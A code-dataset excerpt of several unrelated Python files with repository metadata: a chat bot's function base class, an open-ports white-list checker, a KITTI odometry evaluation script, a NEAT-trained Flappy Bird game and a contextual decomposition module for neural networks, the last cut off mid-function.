lresponse = Response(json.dumps(result), status=status, mimetype='application/json',headers=headers)
return lresponse
def main():
print('Running:{}'.format(MODULE))
app.run(debug=True)
#app.run(host='0.0.0.0',port=PORT)
app.logger.info('Running:{}'.format(MODULE))
if __name__ == "__main__":
main()
| 32.2
| 116
| 0.607143
| 0
| 0
| 0
| 0
| 2,947
| 0.762681
| 0
| 0
| 980
| 0.253623
|
77438c9d6cdc3cb8fd8940ebf432371649706560
| 4,204
|
py
|
Python
|
hallo/function.py
|
joshcoales/Hallo
|
17145d8f76552ecd4cbc5caef8924bd2cf0cbf24
|
[
"MIT"
] | 1
|
2018-05-19T22:27:20.000Z
|
2018-05-19T22:27:20.000Z
|
hallo/function.py
|
joshcoales/Hallo
|
17145d8f76552ecd4cbc5caef8924bd2cf0cbf24
|
[
"MIT"
] | 75
|
2015-09-26T18:07:18.000Z
|
2022-01-04T07:15:11.000Z
|
hallo/function.py
|
SpangleLabs/Hallo
|
17145d8f76552ecd4cbc5caef8924bd2cf0cbf24
|
[
"MIT"
] | 1
|
2021-04-10T12:02:47.000Z
|
2021-04-10T12:02:47.000Z
|
from abc import ABC, abstractmethod
from typing import Set, Type, Optional
from hallo.events import (
EventSecond,
EventMinute,
EventHour,
EventDay,
EventPing,
EventMessage,
EventJoin,
EventLeave,
EventQuit,
EventNameChange,
EventKick,
EventInvite,
EventNotice,
EventMode,
EventCTCP, Event, ServerEvent,
)
class Function(ABC):
"""
Generic function object. All functions inherit from this.
"""
# Static constants
EVENT_SECOND = EventSecond # Event which happens every second
EVENT_MINUTE = EventMinute # Event which happens every minute
EVENT_HOUR = EventHour # Event which happens every hour
EVENT_DAY = EventDay # Event which happens every day
EVENT_PING = EventPing # Event constant signifying a server ping has been received
EVENT_MESSAGE = EventMessage # Event constant signifying a standard message
EVENT_JOIN = EventJoin # Event constant signifying someone joined a channel
EVENT_LEAVE = EventLeave # Event constant signifying someone left a channel
EVENT_QUIT = EventQuit # Event constant signifying someone disconnected
EVENT_CHNAME = (
EventNameChange # Event constant signifying someone changed their name
)
EVENT_KICK = EventKick # Event constant signifying someone was forcibly removed from the channel
EVENT_INVITE = (
EventInvite # Event constant signifying someone has invited hallo to a channel
)
EVENT_NOTICE = (
EventNotice # Event constant signifying a notice was received. (IRC only?)
)
EVENT_MODE = (
EventMode # Event constant signifying a channel mode change. (IRC only?)
)
EVENT_CTCP = (
EventCTCP # Event constant signifying a CTCP message received (IRC only)
)
# EVENT_NUMERIC = "numeric" # Event constant signifying a numeric message from a server (IRC only)
# EVENT_RAW = "raw" # Event constant signifying raw data received from server which doesn't fit the above
def __init__(self):
self.help_name = None # Name for use in help listing
self.names: Set[str] = set() # Set of names which can be used to address the function
self.help_docs = (
None # Help documentation, if it's just a single line, can be set here
)
@abstractmethod
def run(self, event: EventMessage) -> EventMessage:
"""Runs the function when it is called directly
:param event: Event which function wants running on, for which, this should be true:
(is_prefixed is not false and command_args is not None)
"""
raise NotImplementedError
@staticmethod
def is_persistent() -> bool:
"""Returns boolean representing whether this function is supposed to be persistent or not"""
return False
@staticmethod
def load_function() -> 'Function':
"""Loads the function, persistent functions only."""
return Function()
def save_function(self) -> None:
"""Saves the function, persistent functions only."""
return None
def get_passive_events(self) -> Set[Type[Event]]:
"""Returns a list of events which this function may want to respond to in a passive way"""
return set()
def passive_run(self, event: Event, hallo_obj) -> Optional[ServerEvent]:
"""Replies to an event not directly addressed to the bot.
:param event: Event which has called the function
:param hallo_obj: Hallo object which fired the event.
"""
pass
def get_help_name(self) -> str:
"""Returns the name to be printed for help documentation"""
if self.help_name is None:
raise NotImplementedError
return self.help_name
def get_help_docs(self) -> str:
"""
Returns the help documentation, specific to given arguments, if supplied
"""
if self.help_docs is None:
raise NotImplementedError
return self.help_docs
def get_names(self) -> Set[str]:
"""Returns the list of names for directly addressing the function"""
self.names.add(self.help_name)
return self.names
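# Minimal subclass sketch (illustrative only; the exact EventMessage reply API
# is an assumption and may differ in the rest of the hallo codebase):
#
#   class EchoFunction(Function):
#       def __init__(self):
#           super().__init__()
#           self.help_name = "echo"
#           self.names = {"echo"}
#           self.help_docs = "Repeats the given arguments back to the sender."
#
#       def run(self, event: EventMessage) -> EventMessage:
#           # `create_response` is assumed here; substitute the project's real
#           # reply-construction helper.
#           return event.create_response(event.command_args)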
| 36.556522
| 119
| 0.670076
| 3,834
| 0.911989
| 0
| 0
| 637
| 0.151522
| 0
| 0
| 2,149
| 0.51118
|
774895ccb2d658440364d2b85b233c22dd7dda42
| 4,332
|
py
|
Python
|
mbl-core/tests/devices/open-ports-checker/mbl/open_ports_checker/open_ports_checker.py
|
edmund-troche/mbl-core
|
70fd55691301792169fb1feafc2a5e4ba107ee97
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 5
|
2019-08-25T06:18:25.000Z
|
2020-03-20T14:40:18.000Z
|
mbl-core/tests/devices/open-ports-checker/mbl/open_ports_checker/open_ports_checker.py
|
edmund-troche/mbl-core
|
70fd55691301792169fb1feafc2a5e4ba107ee97
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 39
|
2019-06-03T14:31:20.000Z
|
2020-01-13T09:00:04.000Z
|
mbl-core/tests/devices/open-ports-checker/mbl/open_ports_checker/open_ports_checker.py
|
edmund-troche/mbl-core
|
70fd55691301792169fb1feafc2a5e4ba107ee97
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 2
|
2019-11-29T06:12:35.000Z
|
2020-06-17T13:56:39.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2019 Arm Limited and Contributors. All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
"""This script checks for checker for unwanted TCP/UDP open ports."""
import os
import json
import logging
from enum import Enum
import mbl.open_ports_checker.connection as connection
import mbl.open_ports_checker.netstatutils as nsu
__version__ = "1.0"
class Status(Enum):
"""OpenPortsChecker operation status codes."""
SUCCESS = 0
BLACK_LISTED_CONNECTION = 1
class OpenPortsChecker:
"""Checker for unwanted open ports."""
def __init__(self, white_list_filename):
"""
Create and initialize OpenPortsChecker object.
:param white_list_filename: white list .json file name
"""
self.logger = logging.getLogger("OpenPortsChecker")
self.logger.info("Initializing OpenPortsChecker")
self.logger.info("Version {}".format(__version__))
# Load connections white list JSON file
with open(white_list_filename, "r") as in_file:
self.white_list = json.load(in_file)
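        # Expected white list layout (inferred from the checks below; the
        # concrete values are illustrative only):
        #   {"ports":       [{"protocol": "tcp", "port": 22}, ...],
        #    "executables": [{"executable": "/usr/sbin/sshd"}, ...]}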
def run_check(self):
"""
Run open ports check.
:return: Status.SUCCESS if all open ports are white-listed
otherwise Status.BLACK_LISTED_CONNECTION
"""
active_connections = self.__get_list_of_active_connections()
self.logger.debug(
"Found {} active connections".format(len(active_connections))
)
return self.__check_connections_against_white_list(active_connections)
def __check_connection_against_white_list(self, connection):
"""
Check if a single connection is white listed.
:param connection: connection objects to be checked against
white list
:return: Status.SUCCESS
Status.BLACK_LISTED_CONNECTION
"""
check_result = Status.BLACK_LISTED_CONNECTION
ports = self.white_list["ports"]
for port_data in ports:
protocol = port_data["protocol"]
port = port_data["port"]
if connection.is_equal_port(protocol, port):
check_result = Status.SUCCESS
break
executables = self.white_list["executables"]
for executable_data in executables:
executable = executable_data["executable"]
if connection.is_equal_executable(executable):
check_result = Status.SUCCESS
break
return check_result
def __check_connections_against_white_list(self, connections):
"""
Check list of connections against white list.
        If all connections are listed in the white list, the function
        returns Status.SUCCESS; otherwise an error code is returned.
:param connections: list of connections objects to be checked against
white list
:return: Status.SUCCESS
Status.BLACK_LISTED_CONNECTION
"""
self.logger.debug("***Checking connections against white list***")
blacklisted_connections = 0
for connection in connections:
self.logger.debug(
"Checking connection status: {}".format(connection)
)
connection_status = self.__check_connection_against_white_list(
connection
)
self.logger.debug(
"Connection status: {}".format(connection_status)
)
if connection_status != Status.SUCCESS:
blacklisted_connections += 1
self.logger.info(
"Connection {} is blacklisted".format(connection)
)
self.logger.info(
"Found {}/{} blacklisted connections".format(
blacklisted_connections, len(connections)
)
)
return (
Status.SUCCESS
if blacklisted_connections == 0
else Status.BLACK_LISTED_CONNECTION
)
def __get_list_of_active_connections(self):
"""
Get list of all active connections except loopback.
:return: List of active connections
"""
self.logger.debug("Get list of active connections")
active_connections = nsu.netstat()
return active_connections
| 33.84375
| 78
| 0.629732
| 3,931
| 0.907433
| 0
| 0
| 0
| 0
| 0
| 0
| 1,729
| 0.399123
|
77499e42f9ca78c74d1e6fe87f05359b0f2d3da1
| 1,036
|
py
|
Python
|
eval_odom.py
|
nikola3794/kitti-odom-eval
|
c808874dc18db3b60b8c711e55546f09af553659
|
[
"MIT"
] | 110
|
2019-10-21T02:41:57.000Z
|
2022-03-30T20:51:37.000Z
|
eval_odom.py
|
nikola3794/kitti-odom-eval
|
c808874dc18db3b60b8c711e55546f09af553659
|
[
"MIT"
] | 10
|
2020-01-02T09:42:45.000Z
|
2021-11-19T11:53:05.000Z
|
eval_odom.py
|
nikola3794/kitti-odom-eval
|
c808874dc18db3b60b8c711e55546f09af553659
|
[
"MIT"
] | 22
|
2019-11-18T07:40:18.000Z
|
2022-02-20T12:31:29.000Z
|
# Copyright (C) Huangying Zhan 2019. All rights reserved.
import argparse
from kitti_odometry import KittiEvalOdom
parser = argparse.ArgumentParser(description='KITTI evaluation')
parser.add_argument('--result', type=str, required=True,
help="Result directory")
parser.add_argument('--align', type=str,
choices=['scale', 'scale_7dof', '7dof', '6dof'],
default=None,
help="alignment type")
parser.add_argument('--seqs',
nargs="+",
type=int,
help="sequences to be evaluated",
default=None)
args = parser.parse_args()
eval_tool = KittiEvalOdom()
gt_dir = "dataset/kitti_odom/gt_poses/"
result_dir = args.result
continue_flag = input("Evaluate result in {}? [y/n]".format(result_dir))
if continue_flag == "y":
eval_tool.eval(
gt_dir,
result_dir,
alignment=args.align,
seqs=args.seqs,
)
else:
print("Double check the path!")
| 29.6
| 72
| 0.59556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 284
| 0.274131
|
7749a97981a9d33396783bf41834fff772524e60
| 9,115
|
py
|
Python
|
flappy_bird.py
|
wandreuscv/IA_learn_flappy_bird
|
46491f6336aba04af241b78edfd288f59d4b0aec
|
[
"MIT"
] | null | null | null |
flappy_bird.py
|
wandreuscv/IA_learn_flappy_bird
|
46491f6336aba04af241b78edfd288f59d4b0aec
|
[
"MIT"
] | null | null | null |
flappy_bird.py
|
wandreuscv/IA_learn_flappy_bird
|
46491f6336aba04af241b78edfd288f59d4b0aec
|
[
"MIT"
] | null | null | null |
import pygame
import random
import os
import time
import neat
import visualize
import pickle
import bcolors as b
pygame.font.init()
SCORE_MAX = [0, 0, 0]
WIN_WIDTH = 600
WIN_HEIGHT = 800
FLOOR = 730
STAT_FONT = pygame.font.SysFont("comicsans", 50)
END_FONT = pygame.font.SysFont("comicsans", 70)
DRAW_LINES = False
WIN = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))
pygame.display.set_caption("IA LEARNS Flappy Bird")
pipe_img = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","pipe.png")).convert_alpha())
bg_img = pygame.transform.scale(pygame.image.load(os.path.join("imgs","bg.png")).convert_alpha(), (600, 900))
bird_images = [pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","bird" + str(x) + ".png"))) for x in range(1,4)]
base_img = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","base.png")).convert_alpha())
gen = 0
class Bird:
MAX_ROTATION = 25
IMGS = bird_images
ROT_VEL = 20
ANIMATION_TIME = 5
def __init__(self, x, y):
self.x = x
self.y = y
self.tilt = 0
self.tick_count = 0
self.vel = 0
self.height = self.y
self.img_count = 0
self.img = self.IMGS[0]
def jump(self):
self.vel = -10
self.tick_count = 0
self.height = self.y
def move(self):
self.tick_count += 1
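        # Projectile-style kinematics: d = v*t + 0.5*a*t^2, with a fixed
        # downward acceleration of 3 (pixels per tick squared).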
displacement = self.vel*(self.tick_count) + 0.5*(3)*(self.tick_count)**2
if displacement >= 16:
displacement = (displacement/abs(displacement)) * 16
if displacement < 0:
displacement -= 2
self.y = self.y + displacement
if displacement < 0 or self.y < self.height + 50:
if self.tilt < self.MAX_ROTATION:
self.tilt = self.MAX_ROTATION
else:
if self.tilt > -90:
self.tilt -= self.ROT_VEL
def draw(self, win):
self.img_count += 1
if self.img_count <= self.ANIMATION_TIME:
self.img = self.IMGS[0]
elif self.img_count <= self.ANIMATION_TIME*2:
self.img = self.IMGS[1]
elif self.img_count <= self.ANIMATION_TIME*3:
self.img = self.IMGS[2]
elif self.img_count <= self.ANIMATION_TIME*4:
self.img = self.IMGS[1]
elif self.img_count == self.ANIMATION_TIME*4 + 1:
self.img = self.IMGS[0]
self.img_count = 0
if self.tilt <= -80:
self.img = self.IMGS[1]
self.img_count = self.ANIMATION_TIME*2
blitRotateCenter(win, self.img, (self.x, self.y), self.tilt)
def get_mask(self):
return pygame.mask.from_surface(self.img)
class Pipe():
GAP = 200
VEL = 15
def __init__(self, x):
self.x = x
self.height = 0
self.top = 0
self.bottom = 0
self.PIPE_TOP = pygame.transform.flip(pipe_img, False, True)
self.PIPE_BOTTOM = pipe_img
self.passed = False
self.set_height()
def set_height(self):
self.height = random.randrange(50, 450)
self.top = self.height - self.PIPE_TOP.get_height()
self.bottom = self.height + self.GAP
def move(self):
self.x -= self.VEL
def draw(self, win):
win.blit(self.PIPE_TOP, (self.x, self.top))
win.blit(self.PIPE_BOTTOM, (self.x, self.bottom))
def collide(self, bird, win):
bird_mask = bird.get_mask()
top_mask = pygame.mask.from_surface(self.PIPE_TOP)
bottom_mask = pygame.mask.from_surface(self.PIPE_BOTTOM)
top_offset = (self.x - bird.x, self.top - round(bird.y))
bottom_offset = (self.x - bird.x, self.bottom - round(bird.y))
b_point = bird_mask.overlap(bottom_mask, bottom_offset)
t_point = bird_mask.overlap(top_mask,top_offset)
if b_point or t_point:
return True
return False
class Base:
VEL = 5
WIDTH = base_img.get_width()
IMG = base_img
def __init__(self, y):
self.y = y
self.x1 = 0
self.x2 = self.WIDTH
def move(self):
self.x1 -= self.VEL
self.x2 -= self.VEL
if self.x1 + self.WIDTH < 0:
self.x1 = self.x2 + self.WIDTH
if self.x2 + self.WIDTH < 0:
self.x2 = self.x1 + self.WIDTH
def draw(self, win):
win.blit(self.IMG, (self.x1, self.y))
win.blit(self.IMG, (self.x2, self.y))
def blitRotateCenter(surf, image, topleft, angle):
rotated_image = pygame.transform.rotate(image, angle)
new_rect = rotated_image.get_rect(center = image.get_rect(topleft = topleft).center)
surf.blit(rotated_image, new_rect.topleft)
def draw_window(win, birds, pipes, base, score, gen, pipe_ind):
if gen == 0:
gen = 1
win.blit(bg_img, (0,0))
for pipe in pipes:
pipe.draw(win)
base.draw(win)
for bird in birds:
if DRAW_LINES:
try:
pygame.draw.line(win, (255,0,0), (bird.x+bird.img.get_width()/2, bird.y + bird.img.get_height()/2), (pipes[pipe_ind].x + pipes[pipe_ind].PIPE_TOP.get_width()/2, pipes[pipe_ind].height), 5)
pygame.draw.line(win, (255,0,0), (bird.x+bird.img.get_width()/2, bird.y + bird.img.get_height()/2), (pipes[pipe_ind].x + pipes[pipe_ind].PIPE_BOTTOM.get_width()/2, pipes[pipe_ind].bottom), 5)
except:
pass
bird.draw(win)
score_label = STAT_FONT.render("Pontuação: " + str(score),1,(255,255,255))
win.blit(score_label, (WIN_WIDTH - score_label.get_width() - 15, 10))
score_label = STAT_FONT.render("Geração: " + str(gen-1),1,(255,255,255))
win.blit(score_label, (10, 10))
score_label = STAT_FONT.render("Restantes: " + str(len(birds)),1,(255,255,255))
win.blit(score_label, (10, 50))
pygame.display.update()
def eval_genomes(genomes, config):
global WIN, gen
win = WIN
gen += 1
nets = []
birds = []
ge = []
for genome_id, genome in genomes:
genome.fitness = 0
net = neat.nn.FeedForwardNetwork.create(genome, config)
nets.append(net)
birds.append(Bird(230,350))
ge.append(genome)
base = Base(FLOOR)
pipes = [Pipe(700)]
score = 0
clock = pygame.time.Clock()
run = True
while run and len(birds) > 0:
clock.tick(60)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
pygame.quit()
quit()
break
pipe_ind = 0
if len(birds) > 0:
if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_TOP.get_width():
pipe_ind = 1
for x, bird in enumerate(birds):
ge[x].fitness += 0.1
bird.move()
output = nets[birds.index(bird)].activate((bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom)))
if output[0] > 0.5:
bird.jump()
base.move()
rem = []
add_pipe = False
for pipe in pipes:
pipe.move()
for bird in birds:
if pipe.collide(bird, win):
ge[birds.index(bird)].fitness -= 1
nets.pop(birds.index(bird))
ge.pop(birds.index(bird))
birds.pop(birds.index(bird))
if pipe.x + pipe.PIPE_TOP.get_width() < 0:
rem.append(pipe)
if not pipe.passed and pipe.x < bird.x:
pipe.passed = True
add_pipe = True
if add_pipe:
score += 1
for genome in ge:
genome.fitness += 5
pipes.append(Pipe(WIN_WIDTH))
for r in rem:
pipes.remove(r)
for bird in birds:
if bird.y + bird.img.get_height() - 10 >= FLOOR or bird.y < -50:
nets.pop(birds.index(bird))
ge.pop(birds.index(bird))
birds.pop(birds.index(bird))
draw_window(WIN, birds, pipes, base, score, gen, pipe_ind)
if score > SCORE_MAX[0]:
SCORE_MAX[0] = score
SCORE_MAX[1] = gen - 1
SCORE_MAX[2] = genome.fitness
print(b.HELP, 'ACTUAL SCORE:', score, 'from generation:', gen, 'with fitness:', genome.fitness, b.END)
print(b.OKMSG, 'MAX SCORE FOR NOW:', SCORE_MAX[0], b.END, b.ERRMSG, 'by generation:', SCORE_MAX[1], b.END, b.BLUE, 'with fitness:', SCORE_MAX[2], b.END)
def run(config_file):
config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,
neat.DefaultSpeciesSet, neat.DefaultStagnation,
config_file)
p = neat.Population(config)
p.add_reporter(neat.StdOutReporter(True))
stats = neat.StatisticsReporter()
p.add_reporter(stats)
winner = p.run(eval_genomes, 50)
    print('\nBest genome:\n{!s}'.format(winner))
if __name__ == '__main__':
local_dir = os.path.dirname(__file__)
config_path = os.path.join(local_dir, 'config-neat-flappybird.txt')
run(config_path)
| 28.844937
| 207
| 0.576961
| 3,536
| 0.387762
| 0
| 0
| 0
| 0
| 0
| 0
| 311
| 0.034105
|
774a3cbe3570598a07718acd612708e7b85dbeed
| 34,273
|
py
|
Python
|
src/cd.py
|
laura-rieger/deep-explanation-penalization
|
ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f
|
[
"MIT"
] | 105
|
2019-10-01T19:00:35.000Z
|
2022-03-25T14:03:32.000Z
|
src/cd.py
|
laura-rieger/deep-explanation-penalization
|
ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f
|
[
"MIT"
] | 11
|
2020-01-13T15:49:13.000Z
|
2021-12-28T11:36:21.000Z
|
src/cd.py
|
laura-rieger/deep-explanation-penalization
|
ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f
|
[
"MIT"
] | 16
|
2019-12-22T20:53:33.000Z
|
2022-03-15T14:17:50.000Z
|
#original from https://github.com/csinva/hierarchical-dnn-interpretations/blob/master/acd/scores/cd.py
import torch
import torch.nn.functional as F
from copy import deepcopy
from torch import sigmoid
from torch import tanh
import numpy as np
stabilizing_constant = 10e-20
def propagate_three(a, b, c, activation):
a_contrib = 0.5 * (activation(a + c) - activation(c) + activation(a + b + c) - activation(b + c))
b_contrib = 0.5 * (activation(b + c) - activation(c) + activation(a + b + c) - activation(a + c))
return a_contrib, b_contrib, activation(c)
# propagate tanh nonlinearity
def propagate_tanh_two(a, b):
return 0.5 * (tanh(a) + (tanh(a + b) - tanh(b))), 0.5 * (tanh(b) + (tanh(a + b) - tanh(a)))
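# Sanity-check sketch (illustrative helper, not part of the original ACD code):
# both decompositions above are exact, because averaging the two update
# "orderings" telescopes:
#   a_contrib + b_contrib + activation(c) == activation(a + b + c)
#   rel + irrel == tanh(a + b)
def _check_cd_decompositions(a, b, c, activation=sigmoid, atol=1e-6):
    # a, b, c are torch tensors.
    a_contrib, b_contrib, c_contrib = propagate_three(a, b, c, activation)
    assert torch.allclose(a_contrib + b_contrib + c_contrib,
                          activation(a + b + c), atol=atol)
    rel, irrel = propagate_tanh_two(a, b)
    assert torch.allclose(rel + irrel, tanh(a + b), atol=atol)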
# propagate convolutional or linear layer
def propagate_conv_linear(relevant, irrelevant, module, device='cuda'):
bias = module(torch.zeros(irrelevant.size()).to(device))
rel = module(relevant) - bias
irrel = module(irrelevant) - bias
# elementwise proportional
prop_rel = torch.abs(rel)
prop_irrel = torch.abs(irrel)
prop_sum = prop_rel + prop_irrel +stabilizing_constant
prop_rel = torch.div(prop_rel, prop_sum)
prop_irrel = torch.div(prop_irrel, prop_sum)
return rel + torch.mul(prop_rel, bias), irrel + torch.mul(prop_irrel, bias)
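# Note (informal): since the bias is shared between the two streams in
# proportion to |rel| and |irrel|, the returned pair satisfies
# rel_out + irrel_out ~= module(relevant + irrelevant) for linear/conv modules,
# keeping the decomposition (approximately) complete layer by layer.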
def propagate_AdaptiveAvgPool2d(relevant, irrelevant, module, device='cuda'):
rel = module(relevant)
irrel = module(irrelevant)
return rel, irrel
# propagate ReLu nonlinearity
def propagate_relu(relevant, irrelevant, activation, device='cuda'):
swap_inplace = False
try: # handles inplace
if activation.inplace:
swap_inplace = True
activation.inplace = False
except:
pass
zeros = torch.zeros(relevant.size()).to(device)
rel_score = activation(relevant)
irrel_score = activation(relevant + irrelevant) - activation(relevant)
if swap_inplace:
activation.inplace = True
return rel_score, irrel_score
# propagate maxpooling operation
def propagate_pooling(relevant, irrelevant, pooler, model_type='mnist'):
if model_type == 'mnist':
unpool = torch.nn.MaxUnpool2d(kernel_size=2, stride=2)
avg_pooler = torch.nn.AvgPool2d(kernel_size=2, stride=2)
window_size = 4
elif model_type == 'vgg':
unpool = torch.nn.MaxUnpool2d(kernel_size=pooler.kernel_size, stride=pooler.stride)
avg_pooler = torch.nn.AvgPool2d(kernel_size=(pooler.kernel_size, pooler.kernel_size),
stride=(pooler.stride, pooler.stride), count_include_pad=False)
window_size = 4
# get both indices
p = deepcopy(pooler)
p.return_indices = True
both, both_ind = p(relevant + irrelevant)
ones_out = torch.ones_like(both)
size1 = relevant.size()
mask_both = unpool(ones_out, both_ind, output_size=size1)
# relevant
rel = mask_both * relevant
rel = avg_pooler(rel) * window_size
# irrelevant
irrel = mask_both * irrelevant
irrel = avg_pooler(irrel) * window_size
return rel, irrel
# propagate dropout operation
def propagate_dropout(relevant, irrelevant, dropout):
return dropout(relevant), dropout(irrelevant)
# get contextual decomposition scores for blob
def cd(blob, im_torch, model, model_type='mnist', device='cuda'):
# set up model
model.eval()
im_torch = im_torch.to(device)
# set up blobs
blob = torch.FloatTensor(blob).to(device)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
if model_type == 'mnist':
scores = []
mods = list(model.modules())[1:]
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_pooling(relevant, irrelevant,
lambda x: F.max_pool2d(x, 2, return_indices=True), model_type='mnist')
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_pooling(relevant, irrelevant,
lambda x: F.max_pool2d(x, 2, return_indices=True), model_type='mnist')
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant = relevant.view(-1, 800)
irrelevant = irrelevant.view(-1, 800)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[3])
else:
mods = list(model.modules())
for i, mod in enumerate(mods):
t = str(type(mod))
if 'Conv2d' in t or 'Linear' in t:
if 'Linear' in t:
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mod)
elif 'ReLU' in t:
relevant, irrelevant = propagate_relu(relevant, irrelevant, mod)
elif 'MaxPool2d' in t:
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mod, model_type=model_type)
elif 'Dropout' in t:
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mod)
return relevant, irrelevant
# batch of [start, stop) with unigrams working
def cd_batch_text(batch, model, start, stop, my_device = 0):
# rework for
weights = model.lstm
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights.weight_ih_l0, 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights.weight_hh_l0, 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights.bias_ih_l0 + weights.bias_hh_l0, 4)
word_vecs = torch.transpose(model.embed(batch.text).data, 1,2) #change: we take all
T = word_vecs.shape[0]
batch_size = word_vecs.shape[2]
relevant_h = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
irrelevant_h = torch.zeros((model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_rel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_irrel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
for i in range(T):
prev_rel_h = relevant_h
prev_irrel_h = irrelevant_h
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
if i >= start and i <= stop:
rel_i = rel_i +torch.matmul(W_ii, word_vecs[i])
rel_g = rel_g +torch.matmul(W_ig, word_vecs[i])
rel_f = rel_f +torch.matmul(W_if, word_vecs[i])
rel_o = rel_o +torch.matmul(W_io, word_vecs[i])
else:
irrel_i = irrel_i +torch.matmul(W_ii, word_vecs[i])
irrel_g = irrel_g +torch.matmul(W_ig, word_vecs[i])
irrel_f = irrel_f +torch.matmul(W_if, word_vecs[i])
irrel_o = irrel_o +torch.matmul(W_io, word_vecs[i])
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i[:,None], sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g[:,None], tanh)
relevant = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (rel_contrib_i + bias_contrib_i) * irrel_contrib_g
if i >= start and i < stop:
relevant =relevant + bias_contrib_i * bias_contrib_g
else:
irrelevant =irrelevant + bias_contrib_i * bias_contrib_g
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f[:,None], sigmoid)
relevant = relevant +(rel_contrib_f + bias_contrib_f) * prev_rel
irrelevant = irrelevant+(rel_contrib_f + irrel_contrib_f + bias_contrib_f) * prev_irrel + irrel_contrib_f * prev_rel
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o[:,None])
new_rel_h, new_irrel_h = propagate_tanh_two(relevant, irrelevant)
relevant_h = o * new_rel_h
irrelevant_h = o * new_irrel_h
prev_rel = relevant
prev_irrel = irrelevant
W_out = model.hidden_to_label.weight
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h)
irrel_scores = torch.matmul(W_out, irrelevant_h)
#tolerance = 0.001
#assert torch.sum(torch.abs((model.forward(batch) -model.hidden_to_label.bias.data) - (scores+irrel_scores))).cpu().detach().numpy() < tolerance
return scores, irrel_scores
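# Editorial usage sketch (not part of the original source): a minimal example of how
# the batched decomposition above is typically consumed -- the class-score margin
# attributable to the chosen span. Assumes a binary classifier and the same
# batch/model interfaces used by cd_batch_text.
def cd_phrase_margin(batch, model, start, stop):
    rel_scores, irrel_scores = cd_batch_text(batch, model, start, stop)
    # contribution of the span toward class 1 relative to class 0, per example
    return (rel_scores[1] - rel_scores[0]).detach()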
def cd_text_irreg_scores(batch_text, model, start, stop, my_device = 0):
weights = model.lstm
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights.weight_ih_l0, 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights.weight_hh_l0, 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights.bias_ih_l0 + weights.bias_hh_l0, 4)
    word_vecs = torch.transpose(model.embed(batch_text).data, 1, 2)  # whole batch kept; shape (T, embed_dim, batch_size)
T = word_vecs.shape[0]
batch_size = word_vecs.shape[2]
    relevant_h = torch.zeros((model.hidden_dim, batch_size), device=torch.device(my_device), requires_grad=False)
    irrelevant_h = torch.zeros((model.hidden_dim, batch_size), device=torch.device(my_device), requires_grad=False)
    prev_rel = torch.zeros((model.hidden_dim, batch_size), device=torch.device(my_device), requires_grad=False)
    prev_irrel = torch.zeros((model.hidden_dim, batch_size), device=torch.device(my_device), requires_grad=False)
for i in range(T):
prev_rel_h = relevant_h
prev_irrel_h = irrelevant_h
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
